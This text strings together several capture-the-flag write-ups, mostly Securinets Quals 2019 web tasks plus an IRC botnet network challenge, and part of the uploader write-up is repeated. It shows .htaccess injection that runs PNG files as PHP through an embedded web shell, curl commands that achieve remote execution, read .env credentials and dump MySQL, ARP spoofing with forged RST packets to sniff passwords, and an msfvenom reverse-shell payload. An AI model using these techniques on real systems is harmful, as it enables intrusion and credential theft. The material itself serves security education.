Also, the web server is Apache/2.4.25. Maybe the ACLs are written on .htaccess file ?
We tried to write the target and then I added a new line to add another .htaccess entry. But I failed several time until I got the greatest idea:
>Keep it simple
If I need a new line, let me write simply a new line. So I edited the target `<input>` as a `<textarea>` (Ctrl+Maj+I from Chrome browser, then Ctrl+Shift+C and click on the target input)
I changed `input` to `textarea`
Then, I can write easily new lines.
The first test I did to check if new lines works and at the same time I can check if we can trigger an error inside .htaccess file
Target:
```testtest2```
And so we got only `Allow test`. The new created line `test2` was not there.
And as we expected, we triggered a .htaccess error while opening an existing image
We understood why is there a button `I screwed-up everything and I want to reset the task`.
Because we really screwed-up the .htaccess file and we need to reset it.
But, if we only upload PNG and JPEG real files and we can modify .htaccess and bypass editing retrictions from it to add new entries, how can we solve this task and get access to the database ?
After a quick search on internet, we found some documents talking about hardcoding php code inside PNG files that we can execute system commands using HTTP parameters based on this injected code ``
>Reference: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
The creator of this technique was really a genious.
We downloaded the existing exploit [xsspng.png](resources/web-1000-unbreakable_uploader/xsspng.png).
Then, we uploaded that PNG file and it was successfull since it was a real PNG file.
We figured out thatwe should change PNG file types using .htaccess so that PNG files will be executed as PHP files.
>Source: https://security.stackexchange.com/a/122937
So, we will use this value as a `target` value
```testAddType application/x-httpd-php .pngAddHandler application/x-httpd-php .png```
It looks great
And also the uploaded PNG image is not displayed as a PNG file
Now, we are going to exploit the RCE using this command
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=id"``
And we got a nice result
Now, let's find out the database credentials a step by step.
We get the current location
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=pwd"``
So this is a Symfony project. A quick search on google gives up where we can find the database credentials from configuration files.
If the `.env` file exists, if should be there. Otherwise it should be on `app/config/parameters.yml`.
So let's check the project document root
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=ls ../../../ -lA"``
`.env` file exists. So let's cat it
``curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=cat ../../../.env"``
So we got:
```Mysql DatabaseHostname: localhostUsername: symfony_adminPassword: Securinets_dB_P455W0Rd_369Database: symfony_task_3```
In this task, mysqldump will not work. Maybe because of the database that was very big or because of user privileges. So we need to searh the flag inside the database step by step.
Let's show database tables:
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database symfony_task_3 -e 'show tables'"```
But this strangely will not work.
We tried to go back and retrieve database names maybe we did something wrong
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost -e 'show databases'"```
Clear Output:
```Databasebig_databaseinformation_schema```
So the database name that we found on the configuration file `symfony_task_3` was a fake name and instead we should use `big_database`.
Let's list its tables
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database big_database -e 'show tables'"```
Clear output:
```Tables_in_big_databaseuser_details```
And finally we search the flag on that `user_details` table
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e64d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database big_database -e 'select * from user_details' | grep Securinets"```
Clear output:
```69069 paul47 brown morris fl46 Securinets{T00_MuCh_W0rk} 1```
So, the flag is `Securinets{T00_MuCh_W0rk}`.
___
# Scoreboard
This is the tasks list released on the CTF:
And, this is the scoreboard and the rankin for the 100/436 teams that they solved at least one task in this CTF :
If you need the Json file of the scoreboard, you can find it [here](scoreboard/score.json)
|
Trading value was a pretty simple challenge, though we're not sure our solution is the right one ;)
# The Challenge
Trading Value consisted of a page with a graph that seemed to display random values. Looking at the page source we find that the page is sending a request to the server every so often asking for the next value to display (file truncated):
```js{ chart: { type: "spline", animation: Highcharts.svg, // don't animate in old IE marginRight: 10, events: { load: function() { // set up the updating of the chart each second var series = this.series[0]; var formula = "KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc="; setInterval(function() { $.get("/default", { formula: formula, values: { v1: "STC", v2: "PLA", v3: "SDF", v4: "OCK" } }).done(function(data) { var x = new Date().getTime(), // current time y = parseInt(data); if (y < 1000) formula = "KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc="; else if (y > 1000 && y < 10000) formula = "KHYxLm1way12MS5kcmYqKHYxLm1way8xMDApLXYxLmRyZikvKHYxLmF2ZyowLjMpLSh2Mi5hdmcvKCg0LzMpKnYyLm1kcyt2Mi5kbXEqMTAwKSkrKHYzLnBkaSt2My5wZGkrMy8yKig1KnYzLnJhciktNjkqdjMuZ2RwKSsxLjcqKHY0Lm11bSp2NC5kYWQpKjE2LjUqdjQuYXZn"; else if (y > 10000 && y < 100000) formula = "KHYxLm1way12MS5kcmYqKHYxLm1way8wLjEpLXYxLmRyZikvKHYxLmF2ZyowLjgpLSh2Mi5hdmcvKCgxLzIpKnYyLm1kcy0yNC92Mi5kbXEqMTApKSsodjMucGRpLXYzLnBkaSszLzIqKDIvNSp2My5yYXIpLTY2KnYzLmdkcCkqNy41Lyh2NC5tdW0vdjQuZGFkKSo2LjUvdjQuYXZn"; else formula = "KHYxLm1way12MS5kcmYqKHYxLm1way8wLjA2KS12MS5kcmYpLyh2MS5hdmcqMC4yNSkrKHYyLmF2Zy8oKDMvMikvdjIubWRzLTg0L3YyLmRtcSoxOSkpLSh2My5wZGktdjMucGRpKzkvMiooMTIvNyp2My5yYXIpLTY2KnYzLmdkcCkqMC41Lyh2NC5tdW0qKnY0LmRhZCkqMC4zOS92NC5hdmcqKjI="; series.addPoint([x, y], true, true); }); }, 1000); } } }}```
The base64 payloads appear to be some sort of math formulae, for example:`(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg`
So:
- v1, v2, v3 and v4 are sent to the server with the NAME of the object they refer to- The client also chooses which formula the server uses on them
So first of all what happens if we encode `v4` in base64 and send that? The server responds
```object(App\Entity\OCK)#253 (4) { ["id":"App\Entity\OCK":private]=> NULL ["avg"]=> int(267) ["mum"]=> int(21) ["dad"]=> int(80)}```
So `vX` values refer to _actual variables_ in php (a Symfony server). We try to run some shell_exec commands but nothing works, and the errors tell us that the values we send are being inputted into a `new Expression("...")` formula. I didn't know much about Symfony or Expression so I poked around but couldn't find much. I figured i could print any variable in the current scope with values I put in `v1`. I tried `flag` and other values but nothing worked...
Just for fun I decided to set `v1` to `this`. Burp responded with "This message is too large to display". Woooow, ok, time for CURL:
`curl 'https://web1.ctfsecurinets.com/default?formula=djE%3d&values%5Bv1%5D=this' | grep 'Securinets{`
Gives:`string(47) "Securinets{T00_Ea5y_T0_U5e_This_Local_variable}"`
And that's it! We were the first team to flag this ;) |
The binary checks if our input string is correct.The input string is encoded with base64 and compared with base64-encoded flag.
[writeup](https://ptr-yudai.hatenablog.com/entry/2019/03/25/152043#Reversing-980pts-Warmup-Welcome-to-securinets-CTF) |
I loved the network challenges, and this was probably my favorite one. We were the second team to solve it.
```Alt-F4 for OpsDid you know that Alt-F4 is the shortcut for ops in IRC?
Difficulty: hard```
Like with all other network challenges, we are given a VPN to connect to. The first thing I obviously did was to scan the network with nmap (the standard subnet for all challenges in this category was 172.30.0.0/28). Based on experience from previous challenges I expected to find an IRC server and at least one client talking to to it, but...
```Nmap scan report for 172.30.0.1Host is up (0.20s latency).All 1000 scanned ports on 172.30.0.1 are closed
Nmap scan report for 172.30.0.2Host is up (0.20s latency).All 1000 scanned ports on 172.30.0.2 are closed
Nmap scan report for krzysh-laptop (172.30.0.14)Host is up (0.00012s latency).[this is my computer]
Nmap done: 16 IP addresses (3 hosts up) scanned in 102.10 seconds```Wait, what? Where is the IRC server? And why do we suddenly have something on .1 on the network, that never happened before.
Turns out, unlike all the other challenges, we are not dealing with simple LAN communication here, but rather something shaped more like traditional Internet, where 172.30.0.1 is the gateway to the rest of the network. I did an ARP spoof between the computer at .2 and the gateway at .1...
```sudo arpspoof -i tap0 -r -t 172.30.0.2 172.30.0.1
```And there we go, some IRC communication with a server at 172.30.20.10! The obvious thing to try now is connecting to it using an IRC client like irssi (after setting up the routing to that network to go through the gateway on the VPN - `sudo route add -net 172.30.20.0/28 gw 172.30.0.1 dev tap0`), but...```20:44 -!- Irssi: Looking up 172.30.20.1020:44 -!- Irssi: Connecting to 172.30.20.10 [172.30.20.10] port 666720:44 -!- Irssi: Connection to 172.30.20.10 established20:44 !irc.hades.naum *** Looking up your hostname20:44 !irc.hades.naum *** Couldn't look up your hostname20:44 -!- Password incorrect20:44 -!- ERROR Closing Link: 172.30.0.14 (Bad Password)20:44 -!- Irssi: Connection lost to 172.30.20.10```Of course, that would be too easy. What we need to do is somehow force the client to reconnect so that we can capture the PASS command used during initial phase of the connection. Since we are already intercepting in the middle of the communication, we can easily do that by forging a RST TCP packet to kill the connection. I used a scapy script from here to do that: https://gist.github.com/spinpx/263a2ed86f974a55d35cf6c3a2541dc2
A few seconds after running this script, the client attempts to reconnect and we can grab the password command: `PASS underling`. I also noticed `JOIN #void`. So now, let's connect to the server and see what is going on in that channel.This looks like a botnet C&C server, and the file from the payload URL is an ELF binary, perhaps we could send our own one instead? But first, lets look at who is connected```20:54 -!- #void krzys_h H 0 [email protected] [krzys_h]20:54 -!- #void imp63a3 H 0 [email protected] [imp63a3]20:54 -!- #void impac66 H 0 [email protected] [impac66]20:54 -!- #void lordbaal H*@ 0 [email protected] [baal]20:54 -!- End of /WHO list```We see two connected bots and *lordbaal* who seems to be the botnet owner. He is both channel operator (@) and server operator (*), so we are obviously going after him. Let's see some more info about him:```20:59 -!- lordbaal [[email protected]]20:59 -!- ircname : baal20:59 -!- channels : @#sanctum @#void20:59 -!- server : irc.hades.naum [Hades IRC server]20:59 -!- : Dark Lord of Hades20:59 -!- idle : 0 days 0 hours 0 mins 1 secs [signon: Sun Feb 24 20:25:41 2019]20:59 -!- End of WHOIS```Oh, another channel! Join it, maybe?```20:59 -!- #sanctum Cannot join channel (Only lords may enter the sanctum!)```Nah, the challenge wouldn't be classified as hard if it was that easy. Maybe we should "become a lord" by simply changing our username to be prefixed with "lord"?```21:01 -!- lordkrzys Only the chosen may adopt the title of lord!```Okay, I'm out of easy tricks. Let's try to intercept lordbaal's connection somehow. The problem is, he is in another network and ARP spoofing works only on the LAN - but luckily, while we are in a different network, one of the bots (impac66) seems to be on the LAN with the admin! Let's try to hack him first by following the format of payload commands.```21:04 < krzys_h> +impac66, payload http://172.30.0.14/my_reverse_shell_payload21:04 < impac66> krzys_h, running...```where my_reverse_shell_payload was generated with `msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.30.0.14 LPORT=1234 -f elf`
After we got a shell, we have to repeat the process of killing the connection and sniffing we did in the first part... but on a remote computer using a dumb netcat shell. There was no arpspoof installed, but luckily scapy was so we could use that. I used the script from https://medium.com/@ismailakkila/black-hat-python-arp-cache-poisoning-with-scapy-7cb1d8b9d242 for the ARP spoofing part, and the previous one for forging RST. At the end I appended something to dump all traffic after sending the RST packet into the terminal:```pythondef on_packet(t): t.show()
sniff(iface="eth0", count=1000, lfilter=lambda x: x.haslayer(TCP) and (x[IP].src == "172.30.20.2" or x[IP].dst == "172.30.20.2"), prn=on_packet)```By doing this, we can capture admin's login:```PASS suckitinnotech:irc.hades.naum NOTICE * :*** Looking up your hostnameNICK baal:irc.hades.naum NOTICE * :*** Your hostname contains illegal characters, ignoring hostnameUSER eugene 0 * :baal:irc.hades.naum NOTICE baal :*** You are exempt from resvs:irc.hades.naum NOTICE baal :*** You are exempt from flood protection:irc.hades.naum 001 baal :Welcome to the hades Internet Relay Chat Network [email protected]:irc.hades.naum 002 baal :Your host is irc.hades.naum[0.0.0.0/6667], running version hybrid-8.2.25:irc.hades.naum 003 baal :This server was created Feb 22 2019 at 13:14:44:irc.hades.naum 004 baal irc.hades.naum hybrid-8.2.25 DFGHRSWabcdefgijklnopqrsuwy bchiklmnoprstuveCILMNORST bkloveIh:irc.hades.naum 005 baal CALLERID CASEMAPPING=ascii DEAF=D KICKLEN=180 MODES=6 PREFIX=(ohv)@%+ STATUSMSG=@%+ EXCEPTS INVEX NICKLEN=9 NETWORK=hades MAXLIST=beI:100 MAXTARGETS=4 :are supported by this server:irc.hades.naum 005 baal CHANTYPES=# CHANLIMIT=#:25 CHANNELLEN=50 TOPICLEN=80 CHANMODES=beI,k,l,cimnprstuCLMNORST AWAYLEN=180 KNOCK ELIST=CMNTU SAFELIST WATCH=50 :are supported by this server:irc.hades.naum 251 baal :There are 3 users and 1 invisible on 1 servers:irc.hades.naum 254 baal 1 :channels formed:irc.hades.naum 255 baal :I have 4 clients and 0 servers:irc.hades.naum 265 baal :Current local users: 4 Max: 4:irc.hades.naum 266 baal :Current global users: 4 Max: 4:irc.hades.naum 250 baal :Highest connection count: 4 (4 clients) (26 connections received):irc.hades.naum 375 baal :- irc.hades.naum Message of the Day - :irc.hades.naum 372 baal :- ,-.:irc.hades.naum 372 baal :- ___,---.__ /'|`\\ __,---,___:irc.hades.naum 372 baal :- ,-' \\` `-.____,-' | `-.____,-' // `-.:irc.hades.naum 372 baal :- ,' | ~'\\ /`~ | `.:irc.hades.naum 372 baal :- / ___// `. ,' , , \\___ \\:irc.hades.naum 372 baal :- | ,-' `-.__ _ | , __,-' `-. |:irc.hades.naum 372 baal :- | / /\\_ ` . | , _/\\ \\ |:irc.hades.naum 372 baal :- \\ | \\ \\`-.___ \\ | / ___,-'/ / | /:irc.hades.naum 372 baal :- \\ \\ | `._ `\\\\ | //' _,' | / /:irc.hades.naum 372 baal :- `-.\\ /' _ `---'' , . ``---' _ `\\ /,-':irc.hades.naum 372 baal :- `` / \\ ,='/ \\`=. / \\ '':irc.hades.naum 372 baal :- |__ /|\\_,--.,-.--,--._/|\\ __|:irc.hades.naum 372 baal :- / `./ \\\\`\\ | | | /,//' \\,' \\:irc.hades.naum 372 baal :- / / ||--+--|--+-/-| \\ \\:irc.hades.naum 372 baal :- | | /'\\_\\_\\ | /_/_/`\\ | |:irc.hades.naum 372 baal :- \\ \\__, \\_ `~' _/ .__/ /OPER baal darksecret:irc.hades.naum 372 baal :- `-._,-' `-._______,-' `-._,-':irc.hades.naum 372 baal :- NICK lordbaal:irc.hades.naum 372 baal :- TURN BACK NOW!:irc.hades.naum 376 baal :End of /MOTD command.:irc.hades.naum NOTICE * :*** Notice -- [email protected]{baal} is now an operator:[email protected] MODE baal :+alosw:irc.hades.naum 381 baal :You are now an IRC operator:[email protected] NICK :lordbaal:[email protected] NICK :lordbaalJOIN #void:[email protected] JOIN :#void:irc.hades.naum 353 lordbaal = #void :lordbaal impac66 imp63a3 krzys_h:irc.hades.naum 366 lordbaal #void :End of /NAMES list.JOIN #sanctum:[email protected] JOIN :#sanctum:irc.hades.naum MODE #sanctum +nt:irc.hades.naum 353 lordbaal = #sanctum :@lordbaal:irc.hades.naum 366 lordbaal #sanctum :End of /NAMES list.PRIVMSG #void :greetings, impsPRIVMSG #sanctum :pretty lonely in here today...```Okay, so we have the server operator password! Let's just enter it in irssi (/oper username password)```21:22 -!- Only few of mere mortals may try to enter the twilight zone```Oh come on. Maybe we have to use his username (baal) when connecting?```21:23 -!- Only few of mere mortals may try to enter the twilight zone```Umm.. okay, at this point I noticed he used a different password for connecting to the server... maybe try that?```21:24 -!- ERROR Closing Link: 172.30.0.14 (Bad Password)```I give up, let's just stop using irssi and connect to the IRC server using netcat like a pr0 hacker```krzys_h@krzysh-laptop:~ $ nc 172.30.20.10 6667:irc.hades.naum NOTICE * :*** Looking up your hostnamePASS suckitinnotechNICK baalUSER eugene 0 * :baal:irc.hades.naum NOTICE * :*** Couldn't look up your hostname:irc.hades.naum NOTICE baal :*** You are exempt from resvs:irc.hades.naum NOTICE baal :*** You are exempt from flood protection:irc.hades.naum 001 baal :Welcome to the hades Internet Relay Chat Network [email protected][... MOTD ...]:irc.hades.naum 376 baal :End of /MOTD command.OPER baal darksecret:irc.hades.naum NOTICE * :*** Notice -- [email protected]{baal} is now an operator:[email protected] MODE baal :+alosw:irc.hades.naum 381 baal :You are now an IRC operatorNICK lordkrzys:[email protected] NICK :lordkrzysJOIN #sanctum:[email protected] JOIN :#sanctum:irc.hades.naum 353 lordkrzys = #sanctum :lordkrzys @lordbaal:irc.hades.naum 366 lordkrzys #sanctum :End of /NAMES list.:[email protected] PRIVMSG #sanctum :lordkrzys, who the hell are you?! gigem{command_and_out_of_control}```I think the problem was the hostname specified in the USER command. But whatever, we got the flag! It's a shame we don't see network challenges on CTFs more often, I really enjoyed this one. |
# [basics] reCategory: Reverse Engineering
For this challenge all you had to do was run strings on the picture (to reduce clutter, you can also grep for the flag format)
$ strings [calculator](assets/calculator) | grep "utflag"
Obtained the flag: utflag{str1ng5_15_4_h4ndy_t00l} |
# CTFSecurinets Quals 2019 WriteupThis repository serves as a writeup for CTFSecurinets Quals 2019
## Custom Location
**Category:** Web**Points:** 964**Author:** TheEmperors**Description:**
>Try to find out the database credentials.
>The author changed the location of some files to protect the web application from script kiddies.
>Link: https://web0.ctfsecurinets.com/
**Hint:**
> No hint.
### Write-upWhen you visit the task page, you will get this page
Nothing intresting.
Let's try visiting https://web0.ctfsecurinets.com/test
Now we can see an error page. It looks like we have much details as an error page. And it seems that it's based on php Symfony framework.
We try to click on one of the listed files under the error "NotFoundHttpException" text.
For example we try getting access to the link below
We find out that this page show the source code of one of the Symfony project files from this link:
>https://web0.ctfsecurinets.com/_profiler/open?file=vendor/symfony/http-kernel/EventListener/RouterListener.php&line=139#line139
After some tests I changed the URL to:
>https://web0.ctfsecurinets.com/_profiler/
And I was surprised that Symfony web profiler module was enabled. For persons that don't know what profiler is, it's a module that help developpers to debug code while development process. It's enabled on "dev" environnment.
Let's resume what we got, we have profiler enabled and we have to search about database credentials on web profiler configuration.
We get access to one of the logged requests
We go to configuration
And there we can find Symfony configuration
We get access to the "View full PHP configuration" link. But we got a blocking message
It looks like we should find database credentials without phpinfo.
Until now, this is the common solution. The purpose of the task was more difficult. There was only one solution until that the author found a non intending solution.
So I'm gonna start by explaining the non intending solution (easy one) before explaining the intendended solution.
#### Non intended solution (easy one)
This was very easy to find from Request/Response menu. Then, Server Parameters. And then DATABASE_URL variable
>"mysql://symfony_admin:Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}@127.0.0.1:3306/symfony_task"
So the flag is ``Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}``
#### Intended solution (real purpose the task and the hard one)
Because of the previous non intended solution, this intended solution will be very useless. But some teams managed to find this one and that was very smart.
So, I'm gonna explain it.
If we ignore the previous non intended solution, we will try to open the configuration file that contains the database password defined on Symfony project.
So if we return to the configuraion page from the profiler, we can find Symfony framework version
>Symfony 4.2.4
Now, after a quick search from Google, we find the configuration file that contains the database credentials for Symfony 4.2
>https://symfony.com/doc/4.2/best_practices/configuration.html
Then, we try to open `.env` file from the profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=.env
But it looks like that file was not found. And that's when we remember that task name is `Custom Location`. So that we need to find database credentials from a file that was moved to another location.
So how should we find it if we can only read files ?
Since framework configuration files are always available anywhere on the project, our solution was to download a Symfony project (4.2.4) and find out where .env file is loaded. Then we open that file on the Web Profiler on this task. And so we can read the new path of the .env file.
As a requirement, we need to install php 7.1 at least. Otherwise Symfony 3.4 will be installed. But nevermind since starting from Symfony 3.4, the project files tree is the same.
Now, we start searching for the .env file from all Symfony files except Test files, vendor directory (third party directory of any external module), and cache files `grep '\.env' * -R | grep -v Test | grep -v vendor | grep -v cache`
So, after opening all these files, we find that the only possible file that could load `.env` file is `config/bootstrap.php`
And that's how we are going to find out the real `.env` file from the Web Profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=config/bootstrap.php
So, the real `.env` file path is `secret_ctf_location/env`. We try to open it from the Web profiler
>https://web0.ctfsecurinets.com/_profiler/open?file=secret_ctf_location/env
So the flag is `Securinets{D4taB4se_P4sSw0Rd_My5qL_St0L3n}`.___
## Trading values
**Category:** Web**Points:** 989**Author:** TheEmperors**Description:**
>N00B developers are an easy target. Try to exploit the application feature to get the hidden flag.
>Link: https://web1.ctfsecurinets.com/
**Hint (pinned on Web channel from Discord):**
>Hint 1: Trading values: It's a server side task
>Hint 2: Trading values: change request values as a hacker
>Hint 3: Trading values: For the last part of the task: try to find another one. You don't know it but it's known by everyone
### Write-up
After we opened the task link, we get this page with a dynamic line chart drawen on real time.
Reading the source code will not give us anything intresting: [index.html](resources/web-989-trading_values/inedx.html). Maybe because of the `Hint 1`.
So by inspecting Network Tab from the Browser (chrome) development tools (Ctrl+Maj+I, then go to Network Tab)
We can see there that each second a HTTP request is sent somewhere.
We inspect one of these requests. For example this one:
```https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values%5Bv1%5D=STC&values%5Bv2%5D=PLA&values%5Bv3%5D=SDF&values%5Bv4%5D=OCK```
We find the sent parameters request are
```formula: KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc=values[v1]: STCvalues[v2]: PLAvalues[v3]: SDFvalues[v4]: OCK```
And the returned response is a random float number
The sent `formula` parameter was encoded using base64 base.
We decoded it and we got this result:
```(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg```
So the decoded request was
```formula: (v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avgvalues[v1]: STCvalues[v2]: PLAvalues[v3]: SDFvalues[v4]: OCK```
It seems like formula is using v1 attributes (mpk, drf, avg), v2 attributes (avg, mds, dmq), v3 attributes (pdi, rar, gdp, avg) and v4 attributes (mum, dad, avg).
We analyzed different HTTP request parameters and we figured out that formula changes (from Javascript when generating the request) but the concept is the same, the variables v1, v2, v3 and v4 are the same with the same attributes.
The hint 2 `change request values as a hacker` say that we need to change the formula or the values. But everytime we change the values[] value (not the key) we get a HTTP 500 error.
When we remove a values[] parameter (like `values[v4]=OCK`, we get an error that v4 was missing: `Variable "v4" is not valid around position 117 for expression `(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg`. Did you mean "v1"?`
We googled this error and we got an intresting result
It looks like this feature is based on ExpressionLanguage module from Symfony. So the backend project is a php one. And it's trying to compute that formula using those 4 values.
But how if we follow Hint 2 and remove some `values[]` parameters and we also remove those variables from the `formula` parameter and we only keep one variable ?
For example:
```formula: (v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)values[v1]: STC```
So the real parameters request will be (base64(`formula` parameter)):
```formula: KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpvalues[v1]: STC```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEp%3D&values%5Bv1%5D=STC
We also get a float result. This mean that the backend page is answering to this request correctly.
But how if if keep only v1 insteal of v.<attributes> ?
For example:
```formula: v1values[v1]: STC```
So the real parameters request will be (base64(`formula` parameter)):
```formula: djE=values[v1]: STC```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=djE=&values%5Bv1%5D=STC
We get another intresting result
We get the same thing when we replace `STC` by `OCK` or `SDF` or `PLA`:
Results (resume):
```For STC: object(App\Entity\STC)#233 (4) { ["id":"App\Entity\STC":private]=> NULL ["avg"]=> int(909) ["mpk"]=> int(100) ["drf"]=> int(48) }For OCK: object(App\Entity\OCK)#253 (4) { ["id":"App\Entity\OCK":private]=> NULL ["avg"]=> int(43) ["mum"]=> int(96) ["dad"]=> int(39) }For SDF: object(App\Entity\SDF)#252 (5) { ["id":"App\Entity\SDF":private]=> NULL ["avg"]=> int(328) ["pdi"]=> int(87) ["gdp"]=> int(11) ["rar"]=> int(85) }For PLA: object(App\Entity\PLA)#232 (4) { ["id":"App\Entity\PLA":private]=> NULL ["avg"]=> int(556) ["mds"]=> int(17) ["dmq"]=> int(74) }```
So what we talked about before (the v1, v2, v3 and v4 attributes) was correct. And we got a namespace path `(App\Entity\CLASS_NAME` which is related to Symfony (PHP).
But how this works ? We tried to substitute values[v1] value with many values but we always fail.
We read Hint 3 `Trading values: For the last part of the task: try to find another one. You don't know it but it's known by everyone`. This is the difficult part.
Because we don't know about WHAT the author is talking when he say `it`. Maybe is he talking about `values[v1]` value. Because this is what we can actuelly change.
We can't guess it whitout knowing what is `OCK` ? From the previous output, it's an object.
Is the backend page creating a new OCK object using this syntax ? `variable=new <out_input>()` and he is calling computing the formula using that variable ? or is it using `$OCK` variable like this `$<our_input>` ?
We followed the hint 3 and tested `values[v1]=__CLASS__` (to check if the code is going to call `new __CLASS()` to check the first theory. But, we got a blank page (a get a blank page also when we use a random values[v1] value). So this is not working.
Let's try to check the second theory (using a variable name). But we don't know any variable from the backend project.
And since we know that the backend application is based on PHP (Symfony) which is a Framework using classes (this is trivial when we saw namespaces from the object dump `App\Entity\CLASS_NAMES`), we figured out what does mean `Hint 3`. We need to google it and find any well known variable namees that we migh forget it actually but eveyone know it on Internet. And that's how we find the trivial local variable name `$this`.
So we try
```formula: v1values[v1]: this```
So the real parameters request will be (base64(`formula` parameter)):
```formula: djE=values[v1]: this```
>Generated URL: https://web1.ctfsecurinets.com/default?formula=djE=&values%5Bv1%5D=this
And that's how we dump `$this` local variable from which we find the flag
A quick search we find the flag
So, the flag is `Securinets{T00_Ea5y_T0_U5e_This_Local_variable}`.___
## Unbreakable Uploader
**Category:** Web**Points:** 1000**Author:** TheEmperors**Description:**
>Find out the Mysql credentials and search the flag from the database.
>Link: https://web3.ctfsecurinets.com/
**Hint (pinned on Web channel from Discord):**
>Hint 1 for Unbreakable Uploader: try Action deny, target all on the begining
### Write-up
When we visit the task page we get this
We have two ways, trying to upload an Image file or trying to add or remove a restriction.
The second way seems useless actually.
So we tried to exploit an upload vulnerability but whatever my file, the application is very smart and detect my PHP files whatever my bypassing method even if I upload a PHP file renamed as a PNG file. Only JPEG and PNG files are allowed. And I think this is why the task was called `Unbreakable Uploader`.
So, maybe should we exploit another vulnerability from the second part of the task (Restrictions Form).
The first hint was to use Deny as an action and an `all` as a target. After that we opened an image
When, we opened an image, we get a Forbidden response
This means that our all IP address were denied.
It seems that there is an ACL feature to deny and allow targets.
Also, the web server is Apache/2.4.25. Maybe the ACLs are written on .htaccess file ?
We tried to write the target and then I added a new line to add another .htaccess entry. But I failed several time until I got the greatest idea:
>Keep it simple
If I need a new line, let me write simply a new line. So I edited the target `<input>` as a `<textarea>` (Ctrl+Maj+I from Chrome browser, then Ctrl+Shift+C and click on the target input)
I changed `input` to `textarea`
Then, I can write easily new lines.
The first test I did to check if new lines works and at the same time I can check if we can trigger an error inside .htaccess file
Target:
```testtest2```
And so we got only `Allow test`. The new created line `test2` was not there.
And as we expected, we triggered a .htaccess error while opening an existing image
We understood why is there a button `I screwed-up everything and I want to reset the task`.
Because we really screwed-up the .htaccess file and we need to reset it.
